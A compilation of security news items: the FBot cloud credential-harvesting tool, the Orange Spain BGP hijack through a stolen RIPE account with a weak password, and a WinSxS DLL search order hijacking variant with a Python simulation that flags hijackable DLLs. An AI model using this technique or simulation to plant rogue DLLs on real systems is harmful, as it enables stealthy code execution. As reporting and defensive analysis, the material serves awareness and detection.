FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator, all four of which share code-level overlaps with AndroxGh0st.
SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year.
The end goal of the tool is to hijack cloud, SaaS, and web services as well as harvest credentials to obtain initial access and monetize it by selling the access to other actors.
FBot, in addition to generating API keys for AWS and Sendgrid, packs an assortment of features to generate random IP addresses, run reverse IP scanners, and even validate PayPal accounts and the email addresses associated with those accounts.
"The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer's retail sales website," Delamotte noted. "Interestingly, all identified FBot samples use this website to authenticate the Paypal API requests, and several Legion Stealer samples do as well."
On top of that, FBot packs in AWS-specific features to check for AWS Simple Email Service (SES) email configuration details and determine the targeted account's EC2 service quotas. The Twilio-related functionality, likewise, is utilized to gather specifics about the account, namely the balance, currency, and phone numbers connected to the account.
The features don't end there, for the malware is also capable of extracting credentials from Laravel environment files.
The cybersecurity firm said it uncovered samples starting from July 2022 to as recently as this month, suggesting that it is being actively used in the wild. That said, it's currently not known if the tool is actively maintained and how it's distributed to other players.
"We found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation," Delamotte said.
"This aligns with the theme of cloud attack tools being bespoke 'private bots' tailored for the individual buyer, which is a theme prevalent among AlienFox builds."
Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware
5.1.24 Hacking The Hacker News
Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic.
"The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the company said in a message posted on X (formerly Twitter).
However, the company emphasized no personal data was compromised and that the incident only affected some browsing services.
The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain's RIPE account. The RIPE NCC is the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia.
"Using the stolen account, the threat actor modified the AS number belonging to Orange's IP address, resulting in major disruptions to Orange and a 50% loss in traffic," cybersecurity firm Hudson Rock said.
Further analysis has revealed that the email address of the admin account is associated with the computer of an Orange Spain employee who was infiltrated by Raccoon Stealer malware on September 4, 2023.
It's currently not known how the stealer found its way to the employee's system, but such malware families are typically propagated via malvertising or phishing scams.
"Among the corporate credentials identified on the machine, the employee had specific credentials to 'https://access.ripe.net' using the email address which was revealed by the threat actor (adminripe-ipnt@orange.es)," the company added.
Even worse, the password used to secure Orange's RIPE administrator account was "ripeadmin," which is both weak and easily predictable.
Security researcher Kevin Beaumont further noted that RIPE neither mandates two-factor authentication (2FA) nor enforces a strong password policy for its accounts, making it ripe for abuse.
"Currently, infostealer marketplaces are selling thousands of credentials to access.ripe.net — effectively allowing you to repeat this at organizations and ISPs across Europe," Beaumont said.
RIPE, which is currently investigating to see if any other accounts have been affected in a similar manner, said it will directly reach out to affected account holders. It has also urged RIPE NCC Access account users to update their passwords and enable multi-factor authentication for their accounts.
"In the long term, we're expediting the 2FA implementation to make it mandatory for all RIPE NCC Access accounts as soon as possible and to introduce a variety of verification mechanisms," it added.
The incident serves to highlight the consequences of infostealer infections, necessitating that organizations take steps to secure their networks from known initial attack vectors.
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
1.1.24 Hacking The Hacker News
Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11.
The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News.
In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past.
DLL search order hijacking, as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escalation.
Specifically, attacks exploiting the technique single out applications that do not specify the full path to the libraries they require, and instead, rely on a predefined search order to locate the necessary DLLs on disk.
Threat actors take advantage of this behavior by moving legitimate system binaries into non-standard directories that include malicious DLLs that are named after legitimate ones so that the library containing the attack code is picked up in place of the latter.
This works because the loader, after checking modules already loaded into the process and the KnownDLLs list, probes a fixed sequence of directories and takes the first file whose name matches; a rogue DLL therefore wins only if no earlier directory holds the genuine one. With SafeDllSearchMode enabled (the default), the search order is as follows -
The directory from which the application is launched
The folder "C:\Windows\System32"
The folder "C:\Windows\System"
The folder "C:\Windows"
The current working directory
Directories listed in the system's PATH environment variable
Directories listed in the user's PATH environment variable
The novel twist devised by Security Joes targets files located in the trusted "C:\Windows\WinSxS" folder. Short for Windows side-by-side, WinSxS is a critical Windows component that's used for the customization and updating of the operating system to ensure compatibility and integrity.
"Our discovery diverges from this path, unveiling a more subtle and stealthy method of exploitation," the Security Joes report said.
The idea, in a nutshell, is to find binaries in the WinSxS folder that load a DLL by name (e.g., ngentask.exe and aspnet_wp.exe) and combine them with the regular DLL search order hijacking method: the attacker places a custom DLL bearing the same name as the legitimate one in a directory under their control and launches the WinSxS binary with that directory set as the current working directory.
As a result, simply executing a vulnerable file in the WinSxS folder with the folder containing the rogue DLL as the current directory is enough to trigger execution of the DLL's contents, without having to copy the executable out of WinSxS. Nothing but the DLL is written outside the trusted location, which is what gives the technique its stealth.
Security Joes warned that there could be additional binaries in the WinSxS folder that are susceptible to this kind of DLL search order hijacking, necessitating that organizations take adequate precautions to mitigate the exploitation method within their environments.
"Examine parent-child relationships between processes, with a specific focus on trusted binaries," the company said. "Monitor closely all the activities performed by the binaries residing in the WinSxS folder, focusing on both network communications and file operations."
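The following Python simulation is an added example (not Security Joes' tooling) of the loader precedence listed above: it resolves a DLL name against a constructed disk layout and shows which imports an attacker-controlled current directory can satisfy, with SafeDllSearchMode on and off. The WinSxS component directory, the DLL names and the KnownDLLs subset are hypothetical; the real import tables of ngentask.exe and aspnet_wp.exe are not reproduced, and manifest redirection and already-loaded modules are ignored.

```python
import ntpath

SYSTEM_ROOT = r"C:\Windows"
SYSTEM32 = ntpath.join(SYSTEM_ROOT, "System32")
# Constructed subset of HKLM\...\Session Manager\KnownDLLs: these are always mapped from
# System32 and never go through the search order at all.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll"}


def search_order(app_dir, cwd, path_dirs=(), safe_dll_search_mode=True):
    """Directories the loader probes, in order, for a DLL named without a path."""
    system_dirs = [SYSTEM32, ntpath.join(SYSTEM_ROOT, "System"), SYSTEM_ROOT]
    if safe_dll_search_mode:          # default since Windows XP SP2
        order = [app_dir, *system_dirs, cwd]
    else:                             # legacy mode: the CWD is probed right after the app dir
        order = [app_dir, cwd, *system_dirs]
    return order + list(path_dirs)


def resolve_dll(dll_name, present_files, app_dir, cwd, path_dirs=(), safe_dll_search_mode=True):
    """Return the full path the loader would pick for dll_name, or None if nothing matches.

    present_files is the set of file paths that exist on the simulated disk.
    """
    if dll_name.lower() in KNOWN_DLLS:
        return ntpath.join(SYSTEM32, dll_name)
    on_disk = {p.lower() for p in present_files}
    for directory in search_order(app_dir, cwd, path_dirs, safe_dll_search_mode):
        candidate = ntpath.join(directory, dll_name)
        if candidate.lower() in on_disk:
            return candidate
    return None


def hijackable_from_cwd(dll_names, present_files, app_dir, cwd, path_dirs=(), safe_dll_search_mode=True):
    """Which of dll_names would load from cwd if an attacker dropped a same-named DLL there?"""
    hijackable = []
    for dll in dll_names:
        planted = set(present_files) | {ntpath.join(cwd, dll)}
        chosen = resolve_dll(dll, planted, app_dir, cwd, path_dirs, safe_dll_search_mode)
        if chosen and chosen.lower().startswith(cwd.lower() + "\\"):
            hijackable.append(dll)
    return hijackable


# Hypothetical WinSxS component directory, attacker staging directory and disk contents.
WINSXS_APP_DIR = r"C:\Windows\WinSxS\amd64_example-component_1.0.0.0"
ATTACKER_CWD = r"C:\Users\victim\Downloads\stage"
SIMULATED_DISK = {
    ntpath.join(WINSXS_APP_DIR, "ngentask.exe"),
    ntpath.join(SYSTEM32, "kernel32.dll"),
    ntpath.join(SYSTEM32, "example_shared.dll"),   # hypothetical DLL that ships in System32
}
# Hypothetical import list for the WinSxS binary: one known DLL, one shipped in System32,
# one that exists nowhere on the system (the case the technique depends on).
IMPORTS = ["kernel32.dll", "example_shared.dll", "example_missing.dll"]

if __name__ == "__main__":
    for safe in (True, False):
        hits = hijackable_from_cwd(IMPORTS, SIMULATED_DISK, WINSXS_APP_DIR, ATTACKER_CWD,
                                   safe_dll_search_mode=safe)
        print(f"SafeDllSearchMode={safe}: hijackable from CWD -> {hits}")
```

With SafeDllSearchMode on, the attacker's directory only satisfies imports that neither the application directory nor the system directories can, which is why the technique hunts for WinSxS binaries whose DLL dependencies are absent from System32; a DLL that does ship there is unreachable from the CWD unless the legacy search order is in force.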
"This approach represents a novel application in cybersecurity: traditionally, attackers have largely relied on well-known techniques like DLL search order hijacking, a method that manipulates how Windows applications load external libraries and executables," Ido Naor, co-founder and CEO of Security Joes, said in a statement shared with The Hacker News.